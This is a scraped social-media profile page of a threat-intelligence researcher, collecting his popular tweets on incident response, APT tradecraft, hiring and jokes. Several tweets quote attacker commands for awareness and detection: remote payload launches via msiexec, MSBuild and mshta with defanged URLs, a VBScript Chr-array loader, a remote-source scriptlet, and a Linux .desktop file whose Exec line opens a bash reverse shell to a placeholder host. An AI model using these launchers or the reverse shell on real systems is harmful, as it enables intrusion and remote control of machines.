Nick Carr
@ItsReallyNick
Followers
38,475
Following
3,541
Media
2,135
Statuses
12,146
Lead, Cyber Crime Intelligence @Microsoft ☠🏛️ Former Incident Response + Threat Research @Mandiant 🦅 Former Chief Technical Analyst @CISAgov 🛡️
Virginia, USA
Joined September 2009
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
#ช้อปถูกที่Lazada66xZNN
• 120046 Tweets
Normandy
• 106371 Tweets
Uruguay
• 66957 Tweets
Yuta
• 60149 Tweets
政治資金規正法
• 41230 Tweets
#DDay
• 41068 Tweets
Asian Value
• 38908 Tweets
JULIANA AL 9009
• 36719 Tweets
VIRGINIA AL 9009
• 31702 Tweets
Gege
• 29492 Tweets
Jiaoqiu
• 28005 Tweets
悪魔の日
• 27342 Tweets
Hannity
• 24433 Tweets
Yinlin
• 24404 Tweets
Normandie
• 23683 Tweets
インリン
• 17933 Tweets
Bielsa
• 16515 Tweets
#HappyBINIDay
• 16379 Tweets
悪魔の数字
• 13412 Tweets
Ben Carson
• 10793 Tweets
Pinned Tweet
i’m legit amped about aligning with all of the “tip of the spear” teams under the CISO
this part of the public “secure futures” update is a pretty nice acknowledgment of threat intel impact
let’s go! come join us:
🕵️
👻
6
12
56
🆕 Job Update: I'm joining
@Microsoft
!
On the
#MSTIC
R&D team:
☁️🏹hunting & investigations in the cloud (
#AzureSentinel
,
@Office365
)
🎯✍️🏽writing detections for several platforms
👥🎁community-based research & sharing
🛡️🤲🏽protecting those who need it the most
#DefendingDemocracy
98
54
945
So you want to talk about the massive software supply chain intrusion & the most carefully-planned, complex espionage I’ve ever helped uncover?
Start here: 🤩
But then what?? Let’s talk about some post-compromise techniques...
7
356
924
We found the full CARBANAK source code & previously unseen plugins.
Our
#FLARE
team spent 500 hours analyzing the 100,000+ lines of code.
@mykill
&
@jtbennettjr
just dropped day 1 of their 4-part blog series:
Source code linked in blog.
#CarbanakWeek
🦈💳
15
454
797
@patrickwardle
@lemiorhan
@AppleSupport
@Apple
Pretty sure
@Apple
announced the OneClick BlankRoot feature during their macOS High Sierra reveal.
Here is the clip from the WWDC 2017 Keynote: 🤣
9
219
562
How most ransomware incidents actually work 🔻
Access brokers sell access to compromised networks to ransomware-as-a-service affiliates, who conduct the intrusions.
Ransomware-as-a-service affiliates prioritize targets based on intended impact or perceived profit
Intrusion…
9
165
534
I see
@Mandiant
updated their ransomware/extortionware hardening doc. This continues to be my go-to free & digestible resource:
Mandiant's protection & containment strategies (direct link: ) gives insight into methods observed and defenses that have worked against interactive, post-compromise deployment of ransomware.
@cglyer
& I have covered this extortion trend on
#StateOfTheHack
3
21
68
2
147
521
Kudos to the quiet hero who patiently reconstructed this evidence from RDP bitmap cache. It proved Human Machine Interface (HMI) access that was central to the DHS/ICS-CERT reporting, attributed to RU gov.
Most good
#DFIR
stories are based on hours of difficult & thankless work.
9
248
503
Official statement on the root cause of the Hawaii inbound ballistic missile threat alert: “Someone clicked the wrong thing on the computer."
Everyone in infosec nods.
13
158
435
When it comes to threat intel
the best way to cluster ransomware threat actors
is physically together in a jail cell
14
77
449
The difference between red teamers and unauthorized threat actors is red teamers sometimes pay their Azure bill.
12
49
421
Intrusions from skilled cyber crime operators will test your technology ... and your humans.
13
75
384
Fresh APT loader technique for today's
#DailyScriptlet
:
cs=Array(#,#,#,#,...): cmd="": For each c in cs: cmd=cmd&Chr(c): Next: cmd=cmd&vbcrlf: Execute(cmd)
This is remotely loaded into memory from source phishing doc that uses renamed wscript & pubprn.vbs to load COM Scriptlet.
4
240
383
Attackers can check your security visibility faster than you can configure it.
Here's an UNC group we track 😉 using Outlook home page (CVE-2017-11774) to check the target's attack surface and process creation & PowerShell event visibility - then sending it to domain-fronted C2.
4
121
339
1. Attackers abuse Pastebin to host payloads.
2. Some security teams abuse Pastebin APIs to keep up with them.
Glad they’ve finally put a stop to... *checks notes* the second one? 🙃
@MrJamesHemmings
API access is still available - . The Scraping API has been discontinued due to active abuse by third parties for commercial purposes, such activity is prohibited by our current T&C’s, please see Section C, P.4.
8
12
22
10
104
339
Blog post by
@OsandaMalith
/
@m3g9tr0n
:
• covers creative NetNTLM/SMBRelay attack techniques - including regsvr32 🤪
• exemplifies the the value of curiosity in security research
• has me questioning some other processes that make network connections...
6
180
323
On the
@FireEye
Advanced Practices Team, we're interested in targeted attackers using Outlook Homepage shell & persistence, made accessible by
@sensepost
's ruler:
There are VERY few of them detected & publicly-uploaded. Here's one:
10
162
321
What if you could magically rank strings based on their maliciousness?
Now you can: 🧙♂️
We open sourced
#StringSifter
today at
@DerbyCon
.
Built for the blue team, probably useful for red 😉
📺 WATCH
@phtully
@iAmThePr0blem
's talk:
5
121
303
"Be extremely subtle, even to the point of formlessness. Be extremely mysterious, even to the point of soundlessness." - Sun Tzu
...
"Nah, bro I'm good." - this red teamer [pictured]
14
100
292
Things I didn't realize you could do with .URL files:
[InternetShortcut]
URL=javascript: ...
Uploaded 1 hour ago:
#NoShortcuts
7
98
283
👉🏼 “Federal investigators may be unable to readily distinguish between criminals and innocent parties engaged in intelligence gathering. Consequently, it is possible that individuals engaged in legitimate cybersecurity may become the subject of a criminal investigation.” - DOJ
10
120
268
28
23
271
One-click MS Access database code execution by
@424f424f
: 💥
Static VT detection at 0/59.
I expect some dynamic engines will fail to launch this properly as well.
5
178
266
We’re hiring for our cyber crime / counter-ransomware intelligence mission.
Senior analyst position, some details flexible.
I promise you were are working on globally unique and important capabilities.
7
115
270
🔨A Tough Outlook for Home Page Attacks
🔗
Blog has
#APT33
🇮🇷,
#APT34
🇮🇷, and
#UNC1194
🏴😉 home page persistence & RCE.
🔒We talk CVE-2017-11774 patch tampering in-the-wild and made a hardening guide!
😱Cool TTPs (pictured)
#GuardrailsOfTheGalaxy
5
144
268
Yesterday we said an early goodbye to our awesome dog Rocket.
Not just a sweet family dog – he had 12 years on the front lines:
• lap-warming through many late night intrusions
• had been in a SCIF 🙃
• co-authored good blogs & all bad tweets
Much love to all the cyber pets!
55
1
265
New blog! This is one of my favorite adversary tradecraft write-ups this year:
It's cool to see case studies written from the attacker's perspective, exploring intrusion choices made.
@cglyer
& I plan to have author
@ramen0x3f
on the next
#StateOfTheHack
!
4
130
261
"Our approach to domain fronting within Azure is a great example of how the ever-changing dynamics of our world have prompted us to re-examine an important and complicated issue — and ultimately make a change."
👉
Let the data speak & reduce attack surface.
7
107
261
$1.2 billion USD
or as it’s better known in the security industry
25 additional VirusTotal live hunt rules
6
17
258
Name that ransomware/extortion gang - ROUND
#1
. GO!
Redaction, hint highlighting, and comic sans - mine.
Original/spoilers in
@Jon__DiMaggio
's:
12
69
245
Well that's certainly one way to launch mshta! 🧐
Please enjoy this "tasteful" cmd.exe obfuscation before
@danielhbohannon
melts minds in exactly 24 hours with
#DOSfuscation
at Black Hat Asia.
Malicious CSV 🔥 uploaded today. h/t
@TekDefense
0/56 on VT:
6
139
245
🪙 On
#GoldenSAML
remediation:
• Rotate the token-signing AD FS certificate in rapid succession twice
👉If only rotated once, a copy of the previous [compromised?] certificate will still be resident in Azure AD, and can still be used to forge SAML tokens
3
102
247
Critical new defenses for OAuth consent phishing:
• ✅ Publisher verification [pic 1]
• 📋 Customizable app consent policies [pic 2]
• 🚷 Globally disallowing user consent to new multi-tenant apps from unverified publishers (on Nov 8)
👉🏼📰 Details:
5
91
245
Say hello to Fedir Hladyr 👋
The senior sys admin at
#FIN7
's original front company, Combi Security.
He maintained their internal HipChat instance for malware & payment card sharing - and tracked the team's intrusion projects in JIRA.
He puts the "organized" in organized crime.
7
80
228
In this "everyone gets a trophy" culture, it's nice to receive an award from your co-worker that really means something. 🤣
13
16
228
Good morning. ☕️
Let's try something new.
> wmic process call create
> wmic path win32_process call create
If you share a novel* method to launch a process via wmic – without "process "+"call "+"create " – I will DM you a personal $10 Amazon gift card, up to $100 total today.
15
86
229
I led the first Mandiant incident response engagement into an unknown financial actor that eventually became FIN7. Later discovered the CARBANAK source code.
But today I got to hang with the REAL heroes from FBI Seattle who brought justice
😅 @ W perp walking his perp walk photo
10
13
226
tbh seems like there are easier ways to get a job at microsoft
9
16
220
.
@FireEye
is responding to another intrusion into critical infrastructure from the attacker behind
#TRITON
. Here's a brand new blog documenting all of their TTPs (+
@MITREattack
mappings):
Authors
@stvemillertime
@danielcabaniel
@NathanBrubaker
@Kapellmann
1
106
214
Today's UAC bypass
#DailyScriptlet
features:
• Base64 encoding – standard alphabet only – w/ bonus bash decode
•
@facebook
CDN usage – cdn.fbsbx[.]com
• hosted zip written & extracted to %temp%, launched w/ rundll32.exe
VT detection (5/60):
#dfir
8
127
200
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission:
I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
MSTIC is looking for Senior Security Researchers (Malware Reverse Engineers) in the US and Australia to join our MSTIC-RE team. This is an exciting opportunity to make a tangible difference in combating Nation State (NS/APT/DHA) and ransomware threats.
0
44
91
11
77
203
🚨💪💪🚨
“Today we took action to disrupt...
#Trickbot
, one of the world’s most infamous botnets and prolific distributors of
#ransomware
.”
🆕 legal approach: “Our case includes copyright claims against Trickbot’s malicious use of our software code”
🔗⤵️
8
63
202
In honor of the
@Mandiant
rebrand and the kick-off of
#CyberDefenseSummit
(MIRcon) – I bring to you this important piece of security conference history:
Video is now public for the first time 😂
37
31
197
@cyb3rops
@anthomsec
Not the most technically impressive but one of the more brazen moves was a nation state threat actor using the compromised account of the lead security person to reply all to multiple email threads about the potential incident - telling everyone to stand down
7
27
194
@sixdub
@malcomvetter
@InvokeThreatGuy
APT29 HAMMERTOSS did all the things
1. Hosted malz on compromised infra
2. Replaced wermgr.exe - awesome persistence!
3. Algorithm for new Twitter handle daily for APT29 control
4. Additional workweek cmds via GitHub steganography
5. Exfil to cloud storage
5
87
190
Reminder to check all your
#PowerPoint
slides. Some have hyperlink mouseover launch of remote MSI payload stored on
@discordapp
msiexec /i hxxps://cdn.discordapp[.]com/attachments/448418688190775298/455878026576789511/rak.msi /q
💾 "Faktura.ppsx" (2/60):
13
101
187
Found a super spicy 🌶️ take on an
#IQY
file (launched by Excel) while going through my file collections today.
• 0 static VT detections.
• Creative embedded payload & remote launcher.
...turns out it's my coworker
@MrUn1k0d3r
and he's released a POC:
6
97
178
6
80
184
It's been awesome to witness so many teams collaborating to prevent/detect malicious OAuth apps and reduce the attack surface.
Excited for my small part in providing
#AzureSentinel
visibility into suspicious OAuth behavior & tooling. Blog soon!
🙏PwnAuth, O365-attack-toolkit, C3
9
43
186
🆕
#DailyScriptlet
alert: someone just uploaded a fun custom .SCT backdoor PoC
Capable VBScript utility with:
1⃣ Modular layout & launching
2⃣ Robust host recon - OS, AV, HW, compatibility checks
3⃣ HTTP comms & connection check
4⃣ File/process listing & manipulation
9
100
183
#APT32
phishing - now with more
#TweeTPs
Windows.csproj & .mp4 downloaded with certutil
MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService"
Payload loaded in memory then deleted from disk
New approaches used by
#OceanLotus
#APT
group, that leverage macro to load code hidden in the table by minimal white font and executes the downloaded payload through MSBUILD.exe. Either AES or RC4 is used for decryption.
url: hxxp://139.59.30.109:8090/abcv
5
112
170
4
87
184
#StateOfTheHack
streaming now ➕ podcast 🔊
@cglyer
and I covered:
1⃣ Stopping new activity w/
#ManagedDefense
before they dropped
#SHAMOON
2⃣
#DNSpionage
&
@DHSgov
2⃣9⃣
#APT29
w/
@matthewdunwoody
&
@WylieNewmark
to cover HOW then WHY they've changed the game... TAKEAWAYS: 1/n
6
68
188
Stopped using PowerShell for attacks?
Seems to be working just fine for
#APT32
🇻🇳
lang.ps1 uploaded yesterday (3/56):
I appreciate their signature obfuscation style (pictured)
The underlying backdoor here is very creative... [1/2]
5
92
184
𝙵𝙸𝙻𝙴 𝙷𝙰𝚂 𝙱𝙴𝙴𝙽 𝙳𝙰𝙼𝙴𝙶𝙴𝙳 𝙿𝙻𝙴𝙰𝚂𝙴 𝚁𝙴𝚂𝚃𝙰𝚁𝚃 𝙲𝙾𝙼𝙿𝚄𝚃𝙴𝚁 𝚃𝙾 𝙵𝙸𝚇 𝙸𝚃 (𝙴𝚛𝚛𝚘𝚛:𝟶𝚡𝟾𝟶𝟶𝟺𝚏𝚌𝟷𝟸)
☝🏻
#APT32
*still* using fake error codes to shape their victim's behavior.
Require a restart for persistent in-mem backdoor = sandbox evasion
8
77
181
When our awesome
#MSTIC
Russia team discovered this event unfolding in real-time 🤯, here was our crime triage on how DEV-0586's destructive malware differs from 𝘵𝘺𝘱𝘪𝘤𝘢𝘭 human-operated ransomware.
"Ransom" note in the blog: - anything we missed?
Microsoft identified a unique destructive malware operated by an actor tracked as DEV-0586 targeting Ukrainian organizations. Observed activity, TTPs, and IOCs shared in this new MSTIC blog. We'll update the blog as our investigation unfolds.
63
1K
2K
6
47
180
In this guide from Checkpoint, they highlight some default sandbox values that payload developers check for [username check pictured]
I’ve long argued that these make for great home computer user/host names – some extra security layers never hurt 😉
6
51
177
Disrupted a cross-cloud BEC campaign impacting hundreds of victims. Here’s a behind-the-scenes look at their custom tools & techniques
There’s tons more happening to disrupt cyber crime – credit for this particular write-up goes to my coauthor
@Stefan0x531
3
52
182
The definitive visual guide to
#BadRabbit
1⃣ install_flash_player.exe
2⃣ infpub.dat 🐲🐲
3⃣ dispci.exe
3⃣ cscc.dat
3⃣ [A-F0-9]{4}.tmp
6
145
176
Hopefully federal agencies deemed their blue teams "mission essential."
The last
#shutdown
provided unprecedented network signal-to-noise baselining and resulted in several teams detecting new incidents. It also helped scope a large gov IR by isolating the beaconing servers.
4
80
177
I decided to make my own minimalist
#DailyScriptlet
with... a remote payload!
I've also trimmed the fat (XML definition, script language tag, etc)
112 characters:
<scriptlet>
<registration progid="☺">
<script src=""></script>
</registration>
</scriptlet>
2
85
176
Announcing the rollout of security defaults to existing (pre-Oct 2019) tenants 🧑🏽💻🛡
11
41
174
"No engines detected this file" 😒
Let's change that:
^apply this
#yara
rule to unzipped OOXML contents as well!
Pictured: "alpha.docx"
@VirusTotal
(0/60):
Technique by
@enigma0x3
:
7
98
172
Sometimes attackers have more to say – don't forget to check your phishing documents for comments.
#DFIR
In-the-wild [red team] sample this week using character substitution + bitsadmin transfer + csc.exe + .Automation.dll + schtasks 👍🏽
5
70
170
🆕 🔥 Research on PDB Paths from
@stvemillertime
:
#DFIR
primer & exploration of these wonderful artifacts.
Followed by a survey of malware PDB conventions, PDB anomalies, attacker mistakes. All with attribution, including Western gov.
THREAD (1/n)
5
75
167
APT32 loves living off the land.
They copy & rename legit binaries with their initial phish's macros.
🆕 macro method this week, heavy on VBS arrays, persists:
C:\ProgramData\ErroLogon.exe //E:vbscript /b C:\ProgramData\Error.log
Analyzed with
@a_tweeter_user
#AdversaryMethods
2
76
163
Fun fact: the WMI EventFilter registered by this
#DailyScriptlet
for persistence leverages TargetInstance.SystemUptime to specify a launch time range (in seconds).
For malware, the range is often chosen to allow the system to fully boot then launch once.
Method in Vault 7 leak.
How about a
#DailyScriptlet
with spicy VBS obfuscation using split, eval, and chr arithmetic
Launches:
1⃣ Metasploit-style shellcode
2⃣ Registry persistent remote mshta
3⃣ WMI persistent
#squiblydoo
[pictured] cc:
@cglyer
"reg9.sct" uploaded this week:
4
35
85
2
76
165
🚨 Coordinated Global DNS Record Manipulation Campaign
@CyberAmyntas
shares in-the-wild TTPs [pictured]
@bread08
shows connection to
#Iran
🇮🇷
We're still scoping a LARGE amount of activity.
After you 2FA your domain administration portal, read the blog:
4
111
163
Come work with us on the core threat intelligence team: “The Microsoft Threat Intelligence Center (MSTIC) is recruiting experienced nation-state threat hunters – with highly honed threat intelligence analysis skills.”
LFG:
Please DM me if we have worked…
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission:
I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
11
77
203
3
50
162
So I started watching Hawkeye as an escape from work. Only to find out it’s *also* about a bunch of Eastern European criminals in tracksuits with ties to fake security companies
8
6
156
Two-factor authentication:
1⃣Something you know
+
2⃣Something y̶o̶u̶ ̶h̶a̶v̶e̶
your kids are playing with 📱
while you try to finish this one thing
but now you can't do it
4
30
158
Just knocked out the Scranton Half Marathon in some classic PA weather (35 degrees, pouring rain throughout) 🌧🏃🏻♂️
Still managed to get a personal record
1:43:03 @ 7:52 pace 🎉
thanks to a training plan from
@BeWellDianna
15
2
158
If you like to breakdown malicious scripts, I can't recommend
@GCHQ
's
#CyberChef
enough.
You can also create reusable recipes for auto-extraction & decoding of popular encoding techniques.
Example: extracting shellcode from a metasploit-style PowerShell payload
#DailyScriptlet
9
62
155
Yes!
#APT29
🇷🇺 invented this afaik in 2014 when we saw it first-hand (
#NoEasyBreach
).
The key here is it gives timestomping capabilities. Bad guy specifies timestamps within the XML, schtasks applies them. So you can hijack/overwrite existing named scheduled tasks & be a ghost 👻
TIL you can create/modify scheduled tasks with schtasks.exe by importing XML. Apparently this technique was also used by APT29 and APT32.
(ref: )
2
22
88
3
44
157
Pretty cool combination of techniques in the wild:
• External relationship linked within XML with "soap:wsdl=" syntax
• Many layers of encoding including PowerShell in VBE
Uploaded an hour ago, VT Detection: 6/61:
3
92
155
Interesting techniques in this Excel file's malicious macros:
• obfuscated MSBuild payload
• random launch delay
• domain-based guardrail [redacted]
VT (16/60):
🤔XLS author metadata: "Kyle Shockley"
#GuardrailsOfTheGalaxy
💂♂️🛤️🌌
4
51
152
Certutil execution of malicious Base64 content used by APT29 since at least 2014.
@mattifestation
(or
@subTee
?) found/popularized the remote certutil method, loved by APT34/OilRig and many others.
Our teammate
@stvemillertime
shows how to watch your network for it.
#dailypcap
0
72
150
Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching:
mshta http:\\pastebin[.]com\raw\JF0Zjp3g
⚠️ note: simple backslash URL trick
💆 know: "4D 5A" (MZ)
🔚 Result:
#RevengeRAT
on
https://paste[.]ee/r/OaKTX
C2: cugugugu.duckdns[.]org
4
55
152
"Hey, how come I don't get to work on any interesting intrusions?" said everyone who gave up too early.
9
10
146
I know you SO many of you have had intense 2020s – but let me just tell you, I’m hitting with the heavyweights over here 🥴🥊
You cannot imagine the number of life changing events.
I don’t say that to diminish what you’re going through... it’s more that I’m walking with you. ✊🏼
20
3
146
Nice re-analysis of the 19,000
#APT28
shortened URLs used for OAuth social engineering:
Love the animation:
4
97
138
Malicious shortcuts - not just for Windows anymore?
On Linux, drop any code into a .desktop file:
[Desktop Entry]
Name=Emacs
Exec=/bin/bash -i >& /dev/tcp/[RHOST]/[RPORT] 0>&1
Icon=
Terminal=false
Type=Application
#NoShortcuts
[1/2]
7
47
141